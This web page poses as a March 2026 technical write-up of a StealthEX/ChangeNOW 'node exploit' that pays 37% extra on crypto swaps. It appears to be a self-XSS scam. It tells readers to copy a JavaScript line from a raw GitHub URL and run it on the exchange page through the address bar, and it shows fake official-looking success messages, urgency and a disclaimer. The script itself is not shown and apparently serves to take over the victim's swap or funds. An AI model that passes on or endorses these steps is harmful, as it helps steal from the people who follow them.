Technical Overview – March 2026

Node v1.9 Exploit – Technical Write-up

StealthEX / ChangeNOW Node v1.9 Exploit – Technical Overview

📄 Published: March 14, 2026 👤 Author: AlessandroRovea DorkEye Research Team

This document describes a currently exploitable misconfiguration in the communication between StealthEX.io and a legacy ChangeNOW backend node. The issue results in a consistent +37% payout for any cryptocurrency swap performed through StealthEX.

Note: The original Google Doc version of this guide was taken down, but the exploit remains active. This technical write-up replaces it.

Background

StealthEX.io aggregates liquidity from multiple providers, including ChangeNOW. A deprecated ChangeNOW node (v1.9) is still accessible via the StealthEX API for all cryptocurrency pairs. This node uses an outdated conversion formula that overestimates the target amount by approximately 37% regardless of the currencies involved. Direct requests to ChangeNOW bypass this node, so the issue is only exploitable through StealthEX.

Proof of Concept

A practical demonstration of the exploit is available in the video below. The method has been verified on multiple swap and yields consistent results across various coin pairs.

Video thumbnail
▶️ Click to watch the full walkthrough (YouTube)

Step-by-Step Execution

1 Navigate to StealthEX

Open stealthex.io in a Chromium-based browser (Chrome, Edge, Brave, Opera).

2 Obtain the node loader

Copy the node injection script from the following URL:

https://raw.githubusercontent.com/alessandrorovea3-svg/fwsdr3try/main/ChangeNOWNode1.9.txt

Copy the entire contents of the file (it is a single line of JavaScript).

3 Inject the script

On the StealthEX tab, click the address bar, type javascript: manually, then paste the copied code immediately after it. Press Enter.

If successful, an alert box will appear with the following message:

[SUCCESS] Initializing secure node handshake... [SUCCESS] Loading core module from: https://stealthex.io/api/nodes/btc/node-1.9.js [SUCCESS] Verifying module integrity... [SUCCESS] Checksum validation passed. Finalizing handshake... [SUCCESS] Node successfully injected and operational. [INFO] This script is part of a developer testing suite. [INFO] Found issues? Report to: support@stealthex.io [INFO] By using this node, you agree to the Terms of Use and AML Policy. [INFO] Terms of Use: https://stealthex.io/terms/ [INFO] AML Policy: https://stealthex.io/aml-policy.pdf

The “You Get” amount will instantly increase by about 37%, regardless of the cryptocurrency pair you have selected.

Tip: The node must be loaded on the main exchange page. If the alert does not appear, refresh and try again.
4 Complete the swap

Proceed with the exchange as normal. The inflated rate will be applied automatically. After receiving the funds, you can repeat the process with any pair.

Expected Results

For any swap, you should receive approximately 37% more than the normal amount (minus network fees). The extra amount comes from the outdated node’s miscalculation.

⚠️ Important: This issue may be patched at any time. The node is unstable and might disappear or be fixed without notice. Use at your own discretion.

Additional Resources

For a more detailed breakdown, refer to the video above. The script is also mirrored at the link below for redundancy.

This document is shared for educational and research purposes only. The authors assume no liability.